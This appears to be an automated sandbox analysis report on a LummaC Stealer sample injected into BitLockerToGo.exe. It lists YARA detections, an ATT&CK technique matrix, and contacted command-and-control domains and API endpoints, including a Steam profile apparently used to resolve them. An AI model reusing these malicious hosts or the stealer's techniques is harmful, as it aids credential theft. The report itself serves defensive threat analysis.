Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 2.2.BitLockerToGo.exe.26c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1722084290.00000000021A3000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1695494389.00000000021A3000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1722084290.0000000002320000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1695494389.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1695494389.000000000205A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1695494389.0000000002320000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1722084290.000000000205A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 2.2.BitLockerToGo.exe.26c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1722084290.00000000021A3000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1695494389.00000000021A3000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1722084290.0000000002320000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1695494389.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1695494389.000000000205A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1695494389.0000000002320000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1722084290.000000000205A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	311 Process Injection	1 Virtualization/Sandbox Evasion	OS Credential Dumping	1 Security Software Discovery	Remote Services	1 Screen Capture	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	311 Process Injection	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	22 System Information Discovery	SMB/Windows Admin Shares	2 Clipboard Data	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Obfuscated Files or Information	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

⊘No Antivirus matches

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label
locatedblsoqp.shop	100%	URL Reputation	phishing
caffegclasiqwp.shop	100%	URL Reputation	malware
condedqpwqm.shop	100%	URL Reputation	phishing
millyscroqwp.shop	100%	URL Reputation	malware
stamppreewntnq.shop	100%	URL Reputation	phishing
evoliutwoqm.shop	0%	URL Reputation	safe
stagedchheiqwo.shop	100%	URL Reputation	phishing
traineiwnqo.shop	100%	URL Reputation	malware

URLs

Source	Detection	Scanner	Label
https://store.steampowered.com/subscriber_agreement/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	0%	URL Reputation	safe
http://www.valvesoftware.com/legal.htm	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	0%	URL Reputation	safe
https://locatedblsoqp.shop/api	100%	URL Reputation	malware
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&	0%	URL Reputation	safe
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900	100%	URL Reputation	malware
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english	0%	URL Reputation	safe
http://store.steampowered.com/privacy_agreement/	0%	URL Reputation	safe
https://store.steampowered.com/points/shop/	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900/inventory/	100%	URL Reputation	malware
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	0%	URL Reputation	safe
https://store.steampowered.com/privacy_agreement/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC	0%	URL Reputation	safe
https://store.steampowered.com/about/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english	0%	URL Reputation	safe
https://help.steampowered.com/en/	0%	URL Reputation	safe
https://store.steampowered.com/news/	0%	URL Reputation	safe
http://store.steampowered.com/subscriber_agreement/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en	0%	URL Reputation	safe
https://store.steampowered.com/stats/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	0%	URL Reputation	safe
https://store.steampowered.com/steam_refunds/	0%	URL Reputation	safe
https://store.steampowered.com/legal/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl	0%	URL Reputation	safe
https://store.steampowered.com/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english	0%	URL Reputation	safe
http://store.steampowered.com/account/cookiepreferences/	0%	URL Reputation	safe
https://store.steampowered.com/mobile	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
steamcommunity.com	104.102.49.254	true	true		unknown
nippydxmnwquo.shop	188.114.97.3	true	true		unknown
sergei-esenin.com	172.67.206.204	true	true		unknown
locatedblsoqp.shop	unknown	unknown	true	100%, URL Reputation	unknown
caffegclasiqwp.shop	unknown	unknown	true	100%, URL Reputation	unknown
condedqpwqm.shop	unknown	unknown	true	100%, URL Reputation	unknown
millyscroqwp.shop	unknown	unknown	true	100%, URL Reputation	unknown
stamppreewntnq.shop	unknown	unknown	true	100%, URL Reputation	unknown
evoliutwoqm.shop	unknown	unknown	true	0%, URL Reputation	unknown
stagedchheiqwo.shop	unknown	unknown	true	100%, URL Reputation	unknown
traineiwnqo.shop	unknown	unknown	true	100%, URL Reputation	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
nippydxmnwquo.shop	true		unknown
https://steamcommunity.com/profiles/76561199724331900	true	URL Reputation: malware	unknown
https://nippydxmnwquo.shop/api	true		unknown
locatedblsoqp.shop	true		unknown
caffegclasiqwp.shop	true		unknown
millyscroqwp.shop	true		unknown
traineiwnqo.shop	true		unknown
condedqpwqm.shop	true		unknown
stagedchheiqwo.shop	true		unknown
stamppreewntnq.shop	true		unknown
evoliutwoqm.shop	true		unknown
https://sergei-esenin.com/api	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.cloudflare.com/learning/accek	BitLockerToGo.exe, 00000002.00000003.1748346544.0000000002834000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.cloudflare.com/learning/access-management/phishing-attack/	BitLockerToGo.exe, 00000002.00000003.1748278147.0000000002870000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://caffegclasiqwp.shop/	BitLockerToGo.exe, 00000002.00000003.1748346544.0000000002851000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp	BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://caffegclasiqwp.shop/?Sd	BitLockerToGo.exe, 00000002.00000003.1748346544.0000000002851000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://steamcommunity.com/?subsection=broadcasts	BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://github.com/golang/protobuf/issues/1609):	SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe	false		unknown
https://sergei-esenin.com/	BitLockerToGo.exe, 00000002.00000003.1753546592.000000000289F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748346544.0000000002851000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://store.steampowered.com/subscriber_agreement/	BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.cloudflare.com/learning/acce_	BitLockerToGo.exe, 00000002.00000003.1748278147.0000000002885000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://store.steampowered:	BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1753960827.00000000027EB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/puS	BitLockerToGo.exe, 00000002.00000003.1753588016.0000000002886000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753608867.000000000288E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PA	BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.valvesoftware.com/legal.htm	BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp	BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://locatedblsoqp.shop/api	BitLockerToGo.exe, 00000002.00000003.1725358441.0000000002851000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1725358441.0000000002835000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://store.stea	BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&	BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPi	BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1753960827.00000000027EB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english	BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://sergei-esenin.com/~	BitLockerToGo.exe, 00000002.00000002.1753960827.00000000027EB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://store.steampowered.com/privacy_agreement/	BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akam	BitLockerToGo.exe, 00000002.00000002.1754207920.000000000288F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753588016.0000000002886000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753608867.000000000288E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://stagedchheiqwo.shop/api	BitLockerToGo.exe, 00000002.00000003.1748346544.0000000002851000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://store.steampowered.com/points/shop/	BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://caffegclasiqwp.shop/api	BitLockerToGo.exe, 00000002.00000003.1748346544.0000000002851000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://steamcommunity.com/profiles/76561199724331900/inventory/	BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: malware	unknown
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/privacy_agreement/	BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.cloudflare.com/5xx-error-landing	BitLockerToGo.exe, 00000002.00000003.1748278147.0000000002885000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1753960827.00000000027EB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en	BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://sergei-esenin.com/h	BitLockerToGo.exe, 00000002.00000003.1748346544.0000000002851000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://protobuf.dev/reference/go/faq#namespace-conflictnot	SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe	false		unknown
https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&a	BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1753960827.00000000027EB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://locatedblsoqp.shop/	BitLockerToGo.exe, 00000002.00000003.1725358441.0000000002851000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748346544.0000000002851000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://community.akamaC	BitLockerToGo.exe, 00000002.00000003.1753588016.0000000002886000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753608867.000000000288E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am	BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english	BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png	BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://avatars.akamai.steamstatic	BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC	BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/about/	BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/my/wishlist/	BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english	BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://help.steampowered.com/en/	BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/market/	BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://store.steampowered.com/news/	BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://store.steampowered.com/subscriber_agreement/	BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=engli0	BitLockerToGo.exe, 00000002.00000002.1754207920.000000000288F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753588016.0000000002886000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753608867.000000000288E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1	BitLockerToGo.exe, 00000002.00000002.1754207920.000000000288F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753588016.0000000002886000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748193907.0000000002888000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753608867.000000000288E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1748240544.0000000002890000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1753546592.0000000002894000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
